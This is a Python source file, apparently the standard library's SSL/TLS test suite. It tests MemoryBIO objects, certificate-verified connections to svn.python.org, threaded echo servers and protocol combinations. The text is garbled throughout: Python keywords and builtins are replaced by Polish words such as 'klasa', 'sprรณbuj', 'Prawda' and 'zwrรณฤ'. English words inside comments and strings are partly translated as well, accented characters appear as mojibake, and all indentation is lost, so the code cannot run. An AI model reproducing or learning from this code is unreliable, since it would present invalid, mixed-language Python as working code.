self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, Nic)
self.assertRaises(TypeError, bio.write, Prawda)
self.assertRaises(TypeError, bio.write, 1)
klasa NetworkedTests(unittest.TestCase):
def test_connect(self):
przy support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE)
sprรณbuj:
s.connect(("svn.python.org", 443))
self.assertEqual({}, s.getpeercert())
w_koลcu:
s.close()
# this should fail because we have no verification certs
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, ("svn.python.org", 443))
s.close()
# this should succeed because we specify the root cert
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
sprรณbuj:
s.connect(("svn.python.org", 443))
self.assertPrawda(s.getpeercert())
w_koลcu:
s.close()
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
przy support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
sprรณbuj:
self.assertEqual(0, s.connect_ex(("svn.python.org", 443)))
self.assertPrawda(s.getpeercert())
w_koลcu:
s.close()
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
przy support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT,
do_handshake_on_connect=Nieprawda)
sprรณbuj:
s.setblocking(Nieprawda)
rc = s.connect_ex(('svn.python.org', 443))
# EWOULDBLOCK under Windows, EINPROGRESS inaczejwhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait dla connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
dopรณki Prawda:
sprรณbuj:
s.do_handshake()
przerwij
wyjฤ
wszy ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
wyjฤ
wszy ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertPrawda(s.getpeercert())
w_koลcu:
s.close()
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should zwrรณฤ the original
# errno (mimicking the behaviour of non-SSL sockets).
przy support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT,
do_handshake_on_connect=Nieprawda)
sprรณbuj:
s.settimeout(0.0000001)
rc = s.connect_ex(('svn.python.org', 443))
jeลผeli rc == 0:
self.skipTest("svn.python.org responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
w_koลcu:
s.close()
def test_connect_ex_error(self):
przy support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
sprรณbuj:
rc = s.connect_ex(("svn.python.org", 444))
# Issue #19919: Windows machines albo VMs hosted on Windows
# machines sometimes zwrรณฤ EWOULDBLOCK.
self.assertIn(rc, (errno.ECONNREFUSED, errno.EWOULDBLOCK))
w_koลcu:
s.close()
def test_connect_with_context(self):
przy support.transient_internet("svn.python.org"):
# Same jako test_connect, but przy a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect(("svn.python.org", 443))
sprรณbuj:
self.assertEqual({}, s.getpeercert())
w_koลcu:
s.close()
# Same przy a server hostname
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="svn.python.org")
s.connect(("svn.python.org", 443))
s.close()
# This should fail because we have no verification certs
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, ("svn.python.org", 443))
s.close()
# This should succeed because we specify the root cert
ctx.load_verify_locations(SVN_PYTHON_ORG_ROOT_CERT)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect(("svn.python.org", 443))
sprรณbuj:
cert = s.getpeercert()
self.assertPrawda(cert)
w_koลcu:
s.close()
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n oraz 1.0.0, jako a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) dla this test to be portable across OpenSSL releases.
przy support.transient_internet("svn.python.org"):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect(("svn.python.org", 443))
sprรณbuj:
cert = s.getpeercert()
self.assertPrawda(cert)
w_koลcu:
s.close()
# Same przy a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect(("svn.python.org", 443))
sprรณbuj:
cert = s.getpeercert()
self.assertPrawda(cert)
w_koลcu:
s.close()
def test_connect_cadata(self):
przy open(CAFILE_CACERT) jako f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
przy support.transient_internet("svn.python.org"):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=pem)
przy ctx.wrap_socket(socket.socket(socket.AF_INET)) jako s:
s.connect(("svn.python.org", 443))
cert = s.getpeercert()
self.assertPrawda(cert)
# same przy DER
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=der)
przy ctx.wrap_socket(socket.socket(socket.AF_INET)) jako s:
s.connect(("svn.python.org", 443))
cert = s.getpeercert()
self.assertPrawda(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket jako a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object przy makefile() shouldn't
# delay closing the underlying "real socket" (here tested przy its
# file descriptor, hence skipping the test under Windows).
przy support.transient_internet("svn.python.org"):
ss = ssl.wrap_socket(socket.socket(socket.AF_INET))
ss.connect(("svn.python.org", 443))
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd jest still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
przy self.assertRaises(OSError) jako e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
przy support.transient_internet("svn.python.org"):
s = socket.socket(socket.AF_INET)
s.connect(("svn.python.org", 443))
s.setblocking(Nieprawda)
s = ssl.wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=Nieprawda)
count = 0
dopรณki Prawda:
sprรณbuj:
count += 1
s.do_handshake()
przerwij
wyjฤ
wszy ssl.SSLWantReadError:
select.select([s], [], [])
wyjฤ
wszy ssl.SSLWantWriteError:
select.select([], [s], [])
s.close()
jeลผeli support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
def _test_get_server_certificate(host, port, cert=Nic):
przy support.transient_internet(host):
pem = ssl.get_server_certificate((host, port))
jeลผeli nie pem:
self.fail("No server certificate on %s:%s!" % (host, port))
sprรณbuj:
pem = ssl.get_server_certificate((host, port),
ca_certs=CERTFILE)
wyjฤ
wszy ssl.SSLError jako x:
#should fail
jeลผeli support.verbose:
sys.stdout.write("%s\n" % x)
inaczej:
self.fail("Got server certificate %s dla %s:%s!" % (pem, host, port))
pem = ssl.get_server_certificate((host, port),
ca_certs=cert)
jeลผeli nie pem:
self.fail("No server certificate on %s:%s!" % (host, port))
jeลผeli support.verbose:
sys.stdout.write("\nVerified certificate dla %s:%s is\n%s\n" % (host, port ,pem))
_test_get_server_certificate('svn.python.org', 443, SVN_PYTHON_ORG_ROOT_CERT)
jeลผeli support.IPV6_ENABLED:
_test_get_server_certificate('ipv6.google.com', 443)
def test_ciphers(self):
remote = ("svn.python.org", 443)
przy support.transient_internet(remote[0]):
przy ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") jako s:
s.connect(remote)
przy ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") jako s:
s.connect(remote)
# Error checking can happen at instantiation albo when connecting
przy self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
przy socket.socket(socket.AF_INET) jako sock:
s = ssl.wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(remote)
def test_algorithms(self):
# Issue #8484: all algorithms should be available when verifying a
# certificate.
# SHA256 was added w OpenSSL 0.9.8
jeลผeli ssl.OPENSSL_VERSION_INFO < (0, 9, 8, 0, 15):
self.skipTest("SHA256 nie available on %r" % ssl.OPENSSL_VERSION)
# sha256.tbs-internet.com needs SNI to use the correct certificate
jeลผeli nie ssl.HAS_SNI:
self.skipTest("SNI needed dla this test")
# https://sha2.hboeck.de/ was used until 2011-01-08 (no route to host)
remote = ("sha256.tbs-internet.com", 443)
sha256_cert = os.path.join(os.path.dirname(__file__), "sha256.pem")
przy support.transient_internet("sha256.tbs-internet.com"):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(sha256_cert)
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="sha256.tbs-internet.com")
sprรณbuj:
s.connect(remote)
jeลผeli support.verbose:
sys.stdout.write("\nCipher przy %r jest %r\n" %
(remote, s.cipher()))
sys.stdout.write("Certificate is:\n%s\n" %
pprint.pformat(s.getpeercert()))
w_koลcu:
s.close()
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
przy support.transient_internet("svn.python.org"):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect(("svn.python.org", 443))
sprรณbuj:
cert = s.getpeercert()
self.assertPrawda(cert)
w_koลcu:
s.close()
self.assertEqual(len(ctx.get_ca_certs()), 1)
@needs_sni
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
przy support.transient_internet("svn.python.org"):
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = socket.socket(socket.AF_INET)
przy ctx1.wrap_socket(s) jako ss:
ss.connect(("svn.python.org", 443))
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
klasa NetworkedBIOTests(unittest.TestCase):
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
# A simple IO loop. Call func(*args) depending on the error we get
# (WANT_READ albo WANT_WRITE) move data between the socket oraz the BIOs.
timeout = kwargs.get('timeout', 10)
count = 0
dopรณki Prawda:
errno = Nic
count += 1
sprรณbuj:
ret = func(*args)
wyjฤ
wszy ssl.SSLError jako e:
# Note that we get a spurious -1/SSL_ERROR_SYSCALL for
# non-blocking IO. The SSL_shutdown manpage hints at this.
# It *should* be safe to just ignore SYS_ERROR_SYSCALL because
# przy a Memory BIO there's no syscalls (dla IO at least).
jeลผeli e.errno nie w (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE,
ssl.SSL_ERROR_SYSCALL):
podnieล
errno = e.errno
# Get any data z the outgoing BIO irrespective of any error, oraz
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data z the socket oraz put it w the incoming BIO.
jeลผeli errno jest Nic:
przerwij
albo_inaczej errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
jeลผeli buf:
incoming.write(buf)
inaczej:
incoming.write_eof()
jeลผeli support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
zwrรณฤ ret
def test_handshake(self):
przy support.transient_internet("svn.python.org"):
sock = socket.socket(socket.AF_INET)
sock.connect(("svn.python.org", 443))
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(SVN_PYTHON_ORG_ROOT_CERT)
ctx.check_hostname = Prawda
sslobj = ctx.wrap_bio(incoming, outgoing, Nieprawda, 'svn.python.org')
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNic(sslobj.cipher())
self.assertIsNic(sslobj.shared_ciphers())
self.assertRaises(ValueError, sslobj.getpeercert)
jeลผeli 'tls-unique' w ssl.CHANNEL_BINDING_TYPES:
self.assertIsNic(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertPrawda(sslobj.cipher())
self.assertIsNic(sslobj.shared_ciphers())
self.assertPrawda(sslobj.getpeercert())
jeลผeli 'tls-unique' w ssl.CHANNEL_BINDING_TYPES:
self.assertPrawda(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
sock.close()
def test_read_write_data(self):
przy support.transient_internet("svn.python.org"):
sock = socket.socket(socket.AF_INET)
sock.connect(("svn.python.org", 443))
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, Nieprawda)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'GET / HTTP/1.0\r\n\r\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf[:5], b'HTTP/')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
sock.close()
sprรณbuj:
zaimportuj threading
wyjฤ
wszy ImportError:
_have_threads = Nieprawda
inaczej:
_have_threads = Prawda
z test.ssl_servers zaimportuj make_https_server
klasa ThreadedEchoServer(threading.Thread):
klasa ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
przy oraz without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = Nieprawda
self.sock = connsock
self.addr = addr
self.sock.setblocking(1)
self.sslconn = Nic
threading.Thread.__init__(self)
self.daemon = Prawda
def wrap_conn(self):
sprรณbuj:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=Prawda)
self.server.selected_npn_protocols.append(self.sslconn.selected_npn_protocol())
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
wyjฤ
wszy (ssl.SSLError, ConnectionResetError) jako e:
# We treat ConnectionResetError jako though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# XXX Various errors can have happened here, dla example
# a mismatching protocol version, an invalid certificate,
# albo a low-level bug. This should be made more discriminating.
self.server.conn_errors.append(e)
jeลผeli self.server.chatty:
handle_error("\n server: bad connection attempt z " + repr(self.addr) + ":\n")
self.running = Nieprawda
self.server.stop()
self.close()
zwrรณฤ Nieprawda
inaczej:
self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
jeลผeli self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
jeลผeli support.verbose oraz self.server.chatty:
sys.stdout.write(" client cert jest " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(Prawda)
jeลผeli support.verbose oraz self.server.chatty:
sys.stdout.write(" cert binary jest " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
jeลผeli support.verbose oraz self.server.chatty:
sys.stdout.write(" server: connection cipher jest now " + str(cipher) + "\n")
sys.stdout.write(" server: selected protocol jest now "
+ str(self.sslconn.selected_npn_protocol()) + "\n")
zwrรณฤ Prawda
def read(self):
jeลผeli self.sslconn:
zwrรณฤ self.sslconn.read()
inaczej:
zwrรณฤ self.sock.recv(1024)
def write(self, bytes):
jeลผeli self.sslconn:
zwrรณฤ self.sslconn.write(bytes)
inaczej:
zwrรณฤ self.sock.send(bytes)
def close(self):
jeลผeli self.sslconn:
self.sslconn.close()
inaczej:
self.sock.close()
def run(self):
self.running = Prawda
jeลผeli nie self.server.starttls_server:
jeลผeli nie self.wrap_conn():
zwrรณฤ
dopรณki self.running:
sprรณbuj:
msg = self.read()
stripped = msg.strip()
jeลผeli nie stripped:
# eof, so quit this handler
self.running = Nieprawda
self.close()
albo_inaczej stripped == b'over':
jeลผeli support.verbose oraz self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
zwrรณฤ
albo_inaczej (self.server.starttls_server oraz
stripped == b'STARTTLS'):
jeลผeli support.verbose oraz self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS z client, sending OK...\n")
self.write(b"OK\n")
jeลผeli nie self.wrap_conn():
zwrรณฤ
albo_inaczej (self.server.starttls_server oraz self.sslconn
oraz stripped == b'ENDTLS'):
jeลผeli support.verbose oraz self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS z client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = Nic
jeลผeli support.verbose oraz self.server.connectionchatty:
sys.stdout.write(" server: connection jest now unencrypted...\n")
albo_inaczej stripped == b'CB tls-unique':
jeลผeli support.verbose oraz self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique z client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
inaczej:
jeลผeli (support.verbose oraz
self.server.connectionchatty):
ctype = (self.sslconn oraz "encrypted") albo "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
wyjฤ
wszy OSError:
jeลผeli self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = Nieprawda
# normally, we'd just stop here, but dla the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=Nic, ssl_version=Nic,
certreqs=Nic, cacerts=Nic,
chatty=Prawda, connectionchatty=Nieprawda, starttls_server=Nieprawda,
npn_protocols=Nic, alpn_protocols=Nic,
ciphers=Nic, context=Nic):
jeลผeli context:
self.context = context
inaczej:
self.context = ssl.SSLContext(ssl_version
jeลผeli ssl_version jest nie Nic
inaczej ssl.PROTOCOL_TLSv1)
self.context.verify_mode = (certreqs jeลผeli certreqs jest nie Nic
inaczej ssl.CERT_NONE)
jeลผeli cacerts:
self.context.load_verify_locations(cacerts)
jeลผeli certificate:
self.context.load_cert_chain(certificate)
jeลผeli npn_protocols:
self.context.set_npn_protocols(npn_protocols)
jeลผeli alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
jeลผeli ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = Nic
self.active = Nieprawda
self.selected_npn_protocols = []
self.selected_alpn_protocols = []
self.shared_ciphers = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = Prawda
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
zwrรณฤ self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=Nic):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen()
self.active = Prawda
jeลผeli self.flag:
# signal an event
self.flag.set()
dopรณki self.active:
sprรณbuj:
newconn, connaddr = self.sock.accept()
jeลผeli support.verbose oraz self.chatty:
sys.stdout.write(' server: new connection z '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
wyjฤ
wszy socket.timeout:
dalej
wyjฤ
wszy KeyboardInterrupt:
self.stop()
self.sock.close()
def stop(self):
self.active = Nieprawda
klasa AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
klasa EchoServer (asyncore.dispatcher):
klasa ConnectionHandler (asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = ssl.wrap_socket(conn, server_side=Prawda,
certfile=certfile,
do_handshake_on_connect=Nieprawda)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = Prawda
self._do_ssl_handshake()
def readable(self):
jeลผeli isinstance(self.socket, ssl.SSLSocket):
dopรณki self.socket.pending() > 0:
self.handle_read_event()
zwrรณฤ Prawda
def _do_ssl_handshake(self):
sprรณbuj:
self.socket.do_handshake()
wyjฤ
wszy (ssl.SSLWantReadError, ssl.SSLWantWriteError):
zwrรณฤ
wyjฤ
wszy ssl.SSLEOFError:
zwrรณฤ self.handle_close()
wyjฤ
wszy ssl.SSLError:
podnieล
wyjฤ
wszy OSError jako err:
jeลผeli err.args[0] == errno.ECONNABORTED:
zwrรณฤ self.handle_close()
inaczej:
self._ssl_accepting = Nieprawda
def handle_read(self):
jeลผeli self._ssl_accepting:
self._do_ssl_handshake()
inaczej:
data = self.recv(1024)
jeลผeli support.verbose:
sys.stdout.write(" server: read %s z client\n" % repr(data))
jeลผeli nie data:
self.close()
inaczej:
self.send(data.lower())
def handle_close(self):
self.close()
jeลผeli support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
podnieล
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
jeลผeli support.verbose:
sys.stdout.write(" server: new connection z %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
podnieล
def __init__(self, certfile):
self.flag = Nic
self.active = Nieprawda
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = Prawda
def __str__(self):
zwrรณฤ "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
zwrรณฤ self
def __exit__(self, *args):
jeลผeli support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
jeลผeli support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
jeลผeli support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
def start (self, flag=Nic):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = Prawda
jeลผeli self.flag:
self.flag.set()
dopรณki self.active:
sprรณbuj:
asyncore.loop(1)
wyjฤ
wszy:
dalej
def stop(self):
self.active = Nieprawda
self.server.close()
def bad_cert_test(certfile):
"""
Launch a server przy CERT_REQUIRED, oraz check that trying to
connect to it przy the given client certificate fails.
"""
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_REQUIRED,
cacerts=CERTFILE, chatty=Nieprawda,
connectionchatty=Nieprawda)
przy server:
sprรณbuj:
przy socket.socket() jako sock:
s = ssl.wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
wyjฤ
wszy ssl.SSLError jako x:
jeลผeli support.verbose:
sys.stdout.write("\nSSLError jest %s\n" % x.args[1])
wyjฤ
wszy OSError jako x:
jeลผeli support.verbose:
sys.stdout.write("\nOSError jest %s\n" % x.args[1])
wyjฤ
wszy OSError jako x:
jeลผeli x.errno != errno.ENOENT:
podnieล
jeลผeli support.verbose:
sys.stdout.write("\OSError jest %s\n" % str(x))
inaczej:
podnieล AssertionError("Use of invalid cert should have failed!")
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=Prawda, connectionchatty=Nieprawda, sni_name=Nic):
"""
Launch a server, connect a client to it oraz try various reads
oraz writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=Nieprawda)
przy server:
przy client_context.wrap_socket(socket.socket(),
server_hostname=sni_name) jako s:
s.connect((HOST, server.port))
dla arg w [indata, bytearray(indata), memoryview(indata)]:
jeลผeli connectionchatty:
jeลผeli support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
jeลผeli connectionchatty:
jeลผeli support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
jeลผeli outdata != indata.lower():
podnieล AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
jeลผeli connectionchatty:
jeลผeli support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'client_npn_protocol': s.selected_npn_protocol(),
'version': s.version(),
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_npn_protocols'] = server.selected_npn_protocols
stats['server_shared_ciphers'] = server.shared_ciphers
zwrรณฤ stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=Nic, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* jest true, assert that the connection succeeds,
jeลผeli it's false, assert that the connection fails.
Also, jeลผeli *expect_success* jest a string, assert that it jest the protocol
version actually used by the connection.
"""
jeลผeli certsreqs jest Nic:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
jeลผeli support.verbose:
formatstr = (expect_success oraz " %s->%s %s\n") albo " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting z OpenSSL 1.0.0 (see issue #8322).
jeลผeli client_context.protocol == ssl.PROTOCOL_SSLv23:
client_context.set_ciphers("ALL")
dla ctx w (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(CERTFILE)
ctx.load_verify_locations(CERTFILE)
sprรณbuj:
stats = server_params_test(client_context, server_context,
chatty=Nieprawda, connectionchatty=Nieprawda)
# Protocol mismatch can result w either an SSLError, albo a
# "Connection reset by peer" error.
wyjฤ
wszy ssl.SSLError:
jeลผeli expect_success:
podnieล
wyjฤ
wszy OSError jako e:
jeลผeli expect_success albo e.errno != errno.ECONNRESET:
podnieล
inaczej:
jeลผeli nie expect_success:
podnieล AssertionError(
"Client protocol %s succeeded przy server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
albo_inaczej (expect_success jest nie Prawda
oraz expect_success != stats['version']):
podnieล AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
klasa ThreadedTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
jeลผeli support.verbose:
sys.stdout.write("\n")
dla protocol w PROTOCOLS:
przy self.subTest(protocol=ssl._PROTOCOL_NAMES[protocol]):
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=Prawda, connectionchatty=Prawda)
def test_getpeercert(self):
jeลผeli support.verbose:
sys.stdout.write("\n")
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=Nieprawda)
przy server:
s = context.wrap_socket(socket.socket(),
do_handshake_on_connect=Nieprawda)
s.connect((HOST, server.port))
# getpeercert() podnieล ValueError dopรณki the handshake isn't
# done.
przy self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertPrawda(cert, "Can't get peer certificate.")
cipher = s.cipher()
jeลผeli support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher jest " + str(cipher) + '.\n')
jeลผeli 'subject' nie w cert:
self.fail("No subject field w certificate: %s." %
pprint.pformat(cert))
jeลผeli ((('organizationName', 'Python Software Foundation'),)
nie w cert['subject']):
self.fail(
"Missing albo invalid 'organizationName' field w certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
